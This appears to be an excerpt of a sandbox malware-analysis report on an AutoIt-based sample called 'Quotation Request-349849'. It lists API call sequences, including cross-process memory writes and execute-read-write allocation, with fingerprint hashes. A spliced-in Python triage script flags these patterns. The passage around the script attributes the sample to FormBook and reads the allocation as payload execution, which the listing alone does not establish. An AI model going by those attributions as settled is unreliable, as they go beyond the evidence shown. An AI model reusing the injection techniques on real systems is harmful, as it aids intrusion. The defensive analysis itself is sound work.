                                                      • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: _memmove
                                                      • String ID: 3c~$_~
                                                      • API String ID: 4104443479-657907094
                                                      • Opcode ID: f12567dbf6c2b4a9841872f143caa880fa751b8f283e9f202e7d8794b01d2e97
                                                      • Instruction ID: 805d053e914965350157ce40c317113f286a348aff3dc155751e3de9ede58918
                                                      • Opcode Fuzzy Hash: f12567dbf6c2b4a9841872f143caa880fa751b8f283e9f202e7d8794b01d2e97
                                                      • Instruction Fuzzy Hash: 20514BB0A00609DFCF24CF68C885AEEBBB5FF45304F248529E85AD7250EB35E995CB51
                                                      APIs
                                                        • Part of subcall function 008314BC: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00829296,?,?,00000034,00000800,?,00000034), ref: 008314E6
                                                      • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 0082983F
                                                        • Part of subcall function 00831487: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,008292C5,?,?,00000800,?,00001073,00000000,?,?), ref: 008314B1
                                                        • Part of subcall function 008313DE: GetWindowThreadProcessId.USER32(?,?), ref: 00831409
                                                        • Part of subcall function 008313DE: OpenProcess.KERNEL32(00000438,00000000,?,?,?,0082925A,00000034,?,?,00001004,00000000,00000000), ref: 00831419
                                                        • Part of subcall function 008313DE: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,0082925A,00000034,?,?,00001004,00000000,00000000), ref: 0083142F
                                                      • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 008298AC
                                                      • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 008298F9
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                      • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                                      • String ID: @
                                                      • API String ID: 4150878124-2766056989
                                                      • Opcode ID: 3f412a81426931104580092f8fd37cf3eee9ff7bf366b3672a853303378ebf91
                                                      • Instruction ID: 30e27951d5f28c1a6df15b6d64fe0a8f4818bb24f9ee24a0f352c4f3f8deb06d
                                                      • Opcode Fuzzy Hash: 3f412a81426931104580092f8fd37cf3eee9ff7bf366b3672a853303378ebf91
                                                      • Instruction Fuzzy Hash: C0415E7690121CAFCF10DFA4CD85ADEBBB8FB49700F004099FA85B7181DA716E85CBA1
                                                      APIs
                                                      • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,0085F910,00000000,?,?,?,?), ref: 008579DF
                                                      • GetWindowLongW.USER32 ref: 008579FC
                                                      • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00857A0C
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                      • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: Window$Long
                                                      • String ID: SysTreeView32
                                                      • API String ID: 847901565-1698111956
                                                      • Opcode ID: b84a162a3f6c918c864e4a4d933cad158025c3092bd7a47de7b8c046ddd40605
                                                      • Instruction ID: 2c7442c0dd54e8f999350c8bb50c527735438effb69a8994208b80480895fb39
                                                      • Opcode Fuzzy Hash: b84a162a3f6c918c864e4a4d933cad158025c3092bd7a47de7b8c046ddd40605
                                                      • Instruction Fuzzy Hash: 7231FE31204206ABDB118E38DC05BEA7BA9FF04325F248725F975E32E1D734ED558B60
                                                      APIs
                                                      • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 00857461
                                                      • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 00857475
                                                      • SendMessageW.USER32(?,00001002,00000000,?), ref: 00857499
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                      • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: MessageSend$Window
                                                      • String ID: SysMonthCal32
                                                      • API String ID: 2326795674-1439706946
                                                      • Opcode ID: 54fa9c865c0c0c9a9d0a296624155fa260828493ba143f8556601813c6e4ae49
                                                      • Instruction ID: 9db5238440b5879642c2a39ce5716acbf54d7c556265906fc603a923e497f05e
                                                      • Opcode Fuzzy Hash: 54fa9c865c0c0c9a9d0a296624155fa260828493ba143f8556601813c6e4ae49
                                                      • Instruction Fuzzy Hash: D321BF32600218BBDF118EA4DC46FEA3BAAFB48725F114214FE15AB190DA75AC55CBA0
                                                      APIs
                                                      • SendMessageW.USER32(00000000,00000469,?,00000000), ref: 00857C4A
                                                      • SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 00857C58
                                                      • DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00857C5F
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                      • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: MessageSend$DestroyWindow
                                                      • String ID: msctls_updown32
                                                      • API String ID: 4014797782-2298589950
                                                      • Opcode ID: 519652f24c90492f443ccd32ada631d60c3735a1a40a2da3a97a6a8107df43ee
                                                      • Instruction ID: d7be1c722a9ddbde5b86bc90bbf1e9bf4a88f1697bed53bc1e593685806e1f18
                                                      • Opcode Fuzzy Hash: 519652f24c90492f443ccd32ada631d60c3735a1a40a2da3a97a6a8107df43ee
                                                      • Instruction Fuzzy Hash: B9215AB1604208AFDB11EF28DC81CA737ECFB5A3A5B544059FA01DB3A1CA31EC058B60
                                                      APIs
                                                      • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00856D3B
                                                      • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00856D4B
                                                      • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00856D70
                                                       Memory Dump Source
                                                       • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                       • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: MessageSend$MoveWindow
                                                      • String ID: Listbox
                                                      • API String ID: 3315199576-2633736733
                                                      • Opcode ID: 267a37bc33d5b79679ccf4ddc7e97d358b5464bb090abaf2c1c62ceb48d851ef
                                                      • Instruction ID: 86020c3803209aad3f2953d6d4d489a935e8e5597b0decc68836c58ce0d7675c
                                                      • Opcode Fuzzy Hash: 267a37bc33d5b79679ccf4ddc7e97d358b5464bb090abaf2c1c62ceb48d851ef
                                                      • Instruction Fuzzy Hash: 4121C232600118BFDF118F54CC45FBB3BBAFF89761F418124FA459B1A0D6719C658BA0
                                                      APIs
                                                      • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00857772
                                                      • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 00857787
                                                      • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00857794
                                                       Memory Dump Source
                                                       • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                       • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: MessageSend
                                                      • String ID: msctls_trackbar32
                                                      • API String ID: 3850602802-1010561917
                                                      • Opcode ID: 981564ed63a72d914866a1c2344f3bad2b453d25ccdba6282013268de9439636
                                                      • Instruction ID: 3f44146367c06171ee9c328c3745b55931f7412691264b18eff27bc26831ed94
                                                      • Opcode Fuzzy Hash: 981564ed63a72d914866a1c2344f3bad2b453d25ccdba6282013268de9439636
                                                      • Instruction Fuzzy Hash: 0A11E372244208BAEF245F65EC05FEB77A9FF88B65F114229FA41E6190D672E811CB20
                                                      APIs
                                                      • LoadLibraryA.KERNEL32(kernel32.dll,?,007D4B83,?), ref: 007D4C44
                                                      • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 007D4C56
                                                       Memory Dump Source
                                                       • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                       • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: AddressLibraryLoadProc
                                                      • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                                      • API String ID: 2574300362-1355242751
                                                      • Opcode ID: 7a7c47a2b4bc3f8a85bb3bfb021f1564d127b7c2cf149e20330eb2ea923f4be9
                                                      • Instruction ID: f1d22d2fd3658135f2f463132c8e3d15ca48d41ba612b9cbef4960b5ab2ce40d
                                                      • Opcode Fuzzy Hash: 7a7c47a2b4bc3f8a85bb3bfb021f1564d127b7c2cf149e20330eb2ea923f4be9
                                                      • Instruction Fuzzy Hash: 85D01270550B13CFD7205F31D90861677E5BF05352B11883A95A5D6661E678D480C661
                                                      APIs
                                                      • LoadLibraryA.KERNEL32(kernel32.dll,?,007D4BD0,?,007D4DEF,?,008952F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 007D4C11
                                                      • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 007D4C23
                                                       Memory Dump Source
                                                       • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                       • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: AddressLibraryLoadProc
                                                      • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                                      • API String ID: 2574300362-3689287502
                                                      • Opcode ID: ff8e14c7389e7d6667583556da663323d10bf7bdca990695c049d8fc009f48b4
                                                      • Instruction ID: bd84e1a5d2849720068154f53288d8bf6fee9e39af3ffdd68095064afd905ce5
                                                      • Opcode Fuzzy Hash: ff8e14c7389e7d6667583556da663323d10bf7bdca990695c049d8fc009f48b4
                                                      • Instruction Fuzzy Hash: CCD01230551B13CFD7206F71D948606B6E5FF09352B118C3A9595D6651E7B8D480CB61
                                                      APIs
                                                      • LoadLibraryA.KERNEL32(advapi32.dll,?,00851039), ref: 00850DF5
                                                      • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00850E07
                                                       Memory Dump Source
                                                       • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                       • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: AddressLibraryLoadProc
                                                      • String ID: RegDeleteKeyExW$advapi32.dll
                                                      • API String ID: 2574300362-4033151799
                                                      • Opcode ID: 58fd9b5caf3ff4ff81c5004827d1fc4bda98ff773052da5d1fbae9e317532556
                                                      • Instruction ID: f6cfef2339ec9c7e363b60432a7fd061fdac59edbbf7eca7c7e5abc2afe29c67
                                                      • Opcode Fuzzy Hash: 58fd9b5caf3ff4ff81c5004827d1fc4bda98ff773052da5d1fbae9e317532556
                                                      • Instruction Fuzzy Hash: 66D08230440B22CFC322AF70C80928272E5FF00393F248C2ED9D2C2250E6B8D8908A40
                                                      APIs
                                                      • LoadLibraryA.KERNEL32(kernel32.dll,00000001,00848CF4,?,0085F910), ref: 008490EE
                                                      • GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 00849100
                                                       Memory Dump Source
                                                       • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                       • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: AddressLibraryLoadProc
                                                      • String ID: GetModuleHandleExW$kernel32.dll
                                                      • API String ID: 2574300362-199464113
                                                      • Opcode ID: 447a533dafdd24a4d90d95d3d69748c4acbc7f043eb4b30393951ba346eff006
                                                      • Instruction ID: c97724c998dc6066430fef67ebea924f8efa6d1877d65f57513a8d0538aac9d1
                                                      • Opcode Fuzzy Hash: 447a533dafdd24a4d90d95d3d69748c4acbc7f043eb4b30393951ba346eff006
                                                      • Instruction Fuzzy Hash: 7DD01734550B13CFDB30AF31D81860776E5FF05392B12887AEAD6D6A91FA78C880CB91
                                                       Memory Dump Source
                                                       • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                       • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: LocalTime__swprintf
                                                      • String ID: %.3d$WIN_XPe
                                                      • API String ID: 2070861257-2409531811
                                                      • Opcode ID: 7122b20967dfab60c9943f483a5b50d5ca295529ee1edbfe62a6075d9cea6a6c
                                                      • Instruction ID: 77c3a4656e17c62b060bc6bf23e84e5da3516655153e7950b51aacd37799b07d
                                                      • Opcode Fuzzy Hash: 7122b20967dfab60c9943f483a5b50d5ca295529ee1edbfe62a6075d9cea6a6c
                                                      • Instruction Fuzzy Hash: 1AD0127580510DEACF019690988C8F9737CFF08305F140852F702D2684E22987D4D721
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                       • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 53be13f92b62323735c3052337a8296531693415e681670e5cc8115339fde928
                                                      • Instruction ID: 66b6d038cdd7030522be064797edc13b335f9c4b7a36c0e4827e5a83c0cd903b
                                                      • Opcode Fuzzy Hash: 53be13f92b62323735c3052337a8296531693415e681670e5cc8115339fde928
                                                      • Instruction Fuzzy Hash: D6C17F74A0422AEFCB14DFA5D884EAEBBB5FF48714B148598E805EB351D730ED81DB90
                                                      APIs
                                                      • CharLowerBuffW.USER32(?,?), ref: 0084E0BE
                                                      • CharLowerBuffW.USER32(?,?), ref: 0084E101
                                                        • Part of subcall function 0084D7A5: CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 0084D7C5
                                                      • VirtualAlloc.KERNEL32(00000000,00000077,00003000,00000040), ref: 0084E301
                                                      • _memmove.LIBCMT ref: 0084E314
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                       • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: BuffCharLower$AllocVirtual_memmove
                                                      • String ID:
                                                      • API String ID: 3659485706-0
                                                      • Opcode ID: 1775547d8be8920326d1318c551de36c059db221e89fff7a0635e274f845eeee
                                                      • Instruction ID: cadb66f254ab2966096b016aaca5f1be3a38d49de95032fa241a28a987586dbc
                                                      • Opcode Fuzzy Hash: 1775547d8be8920326d1318c551de36c059db221e89fff7a0635e274f845eeee
                                                      • Instruction Fuzzy Hash: 39C13471A083058FC714DF28C480A6ABBE4FF89718F04896EF999DB351D774E946CB82
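The listings above contain the two patterns an analyst pulls out of a report like this first: LoadLibraryA/GetProcAddress pairs that resolve Wow64DisableWow64FsRedirection, Wow64RevertWow64FsRedirection, RegDeleteKeyExW and GetModuleHandleExW by name at runtime (so they never appear in the import table), and a VirtualAlloc with MEM_COMMIT|MEM_RESERVE (0x3000) and PAGE_EXECUTE_READWRITE (0x40) immediately followed by _memmove, which is the shape of code being copied into freshly allocated executable memory. The Python below is an added example for this page; it is not Joe Sandbox code and not part of the AutoIt runtime or the FormBook sample. It parses the report's own `Name.MODULE(args), ref: addr` line format and flags those patterns, and decodes the SendMessageW message IDs seen on this page (LB_*, TBM_*, TVM_*). The sample input is copied from the API lines above; the message-ID table is limited to constants that actually occur here.

```python
"""Triage helper for Joe Sandbox per-function 'APIs' listings.

Added example for this page; not Joe Sandbox code and not part of the AutoIt
runtime or the FormBook sample that the report describes.
"""
import re
from dataclasses import dataclass

# Sample input copied from the API lines of this report, so the example runs
# offline. The indented "Part of subcall" line is there to show it is skipped.
SAMPLE_LINES = """\
• LoadLibraryA.KERNEL32(kernel32.dll,?,007D4B83,?), ref: 007D4C44
• GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 007D4C56
• LoadLibraryA.KERNEL32(kernel32.dll,?,007D4BD0,?,007D4DEF,?,008952F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 007D4C11
• GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 007D4C23
• LoadLibraryA.KERNEL32(advapi32.dll,?,00851039), ref: 00850DF5
• GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00850E07
• SendMessageW.USER32(?,00000406,00000000,00640000), ref: 00857787
• SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00857794
• VirtualAlloc.KERNEL32(00000000,00000077,00003000,00000040), ref: 0084E301
• _memmove.LIBCMT ref: 0084E314
  • Part of subcall function 0084D7A5: CharLowerBuffW.USER32(?,?), ref: 0084D7C5
"""

# One report line: "<api>.<module>(<args>), ref: <addr>". The parenthesised
# argument list is absent for CRT calls such as "_memmove.LIBCMT ref: 0084E314".
API_LINE = re.compile(
    r"^\s*[•*-]?\s*(?P<name>[A-Za-z_]\w*)\.(?P<module>[A-Za-z0-9]+)"
    r"(?:\((?P<args>.*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)


@dataclass
class ApiCall:
    name: str
    module: str
    args: list   # argument strings exactly as printed: 8 hex digits, '?', or text
    ref: int     # address of the call site inside the dump


def parse_api_lines(text: str) -> list:
    """Parse the 'APIs' bullet lines; 'Part of subcall' lines do not match."""
    calls = []
    for line in text.splitlines():
        m = API_LINE.match(line)
        if not m:
            continue
        raw = m.group("args")
        # Arguments on this page never contain commas inside a string, so a
        # plain split is sufficient here.
        args = [a.strip() for a in raw.split(",")] if raw else []
        calls.append(ApiCall(m.group("name"), m.group("module"), args,
                             int(m.group("ref"), 16)))
    return calls


def as_int(arg: str):
    """Eight hex digits -> int; '?' or a string argument -> None."""
    return int(arg, 16) if re.fullmatch(r"[0-9A-Fa-f]{8}", arg) else None


# Only the window messages that occur in this report's listings.
MESSAGE_NAMES = {
    0x0180: "LB_ADDSTRING", 0x0186: "LB_SETCURSEL",
    0x0405: "TBM_SETPOS", 0x0406: "TBM_SETRANGE", 0x0414: "TBM_SETTICFREQ",
    0x110A: "TVM_GETNEXTITEM", 0x113E: "TVM_GETITEMW",
}
PAGE_EXECUTE_READWRITE = 0x40


def triage(calls) -> list:
    """Return (kind, detail, ref) findings in listing order."""
    findings = []
    last_lib = None       # module named by the most recent LoadLibraryA
    rwx_pending = False   # an RWX VirtualAlloc not yet followed by a copy
    for c in calls:
        if c.name == "LoadLibraryA" and c.args:
            last_lib = c.args[0]
        elif c.name == "GetProcAddress" and len(c.args) >= 2 and as_int(c.args[1]) is None:
            # Resolved by name at runtime: the import table will not list it.
            # (Ordinal lookups print as hex and are deliberately not flagged.)
            findings.append(("dynamic_import", f"{last_lib or '?'}!{c.args[1]}", c.ref))
        elif c.name == "VirtualAlloc" and len(c.args) >= 4 and as_int(c.args[3]) == PAGE_EXECUTE_READWRITE:
            findings.append(("rwx_alloc", f"{as_int(c.args[1])} bytes PAGE_EXECUTE_READWRITE", c.ref))
            rwx_pending = True
        elif c.name == "_memmove" and rwx_pending:
            findings.append(("copy_to_rwx", "memmove into the RWX region", c.ref))
            rwx_pending = False
        elif c.name == "SendMessageW" and len(c.args) >= 2:
            msg = as_int(c.args[1])
            label = MESSAGE_NAMES.get(msg, "?" if msg is None else f"0x{msg:04X}")
            if label == "TBM_SETRANGE" and len(c.args) >= 4 and (lp := as_int(c.args[3])) is not None:
                label += f" range {lp & 0xFFFF}..{lp >> 16}"  # lParam = MAKELONG(min, max)
            findings.append(("gui_message", label, c.ref))
    return findings


def triage_text(text: str) -> list:
    return triage(parse_api_lines(text))


if __name__ == "__main__":
    for kind, detail, ref in triage_text(SAMPLE_LINES):
        print(f"{ref:08X}  {kind:15} {detail}")
```

Two caveats when reading the output. The dynamic imports are the AutoIt interpreter's own compatibility code (these APIs are resolved at runtime so the same 32-bit binary still loads on Windows versions that lack them) and on their own say nothing about the payload; the `TBM_SETRANGE range 0..100` decode is likewise just a slider control being set up. The `rwx_alloc` followed by `copy_to_rwx` at 0084E301/0084E314 is the finding worth following into the dump, since it is the point where the script's bytes become executable memory.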
                                                      APIs
                                                      • CoInitialize.OLE32(00000000), ref: 008480C3
                                                      • CoUninitialize.OLE32 ref: 008480CE
                                                        • Part of subcall function 0082D56C: CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 0082D5D4
                                                      • VariantInit.OLEAUT32(?), ref: 008480D9
                                                      • VariantClear.OLEAUT32(?), ref: 008483AA
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                       • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmp
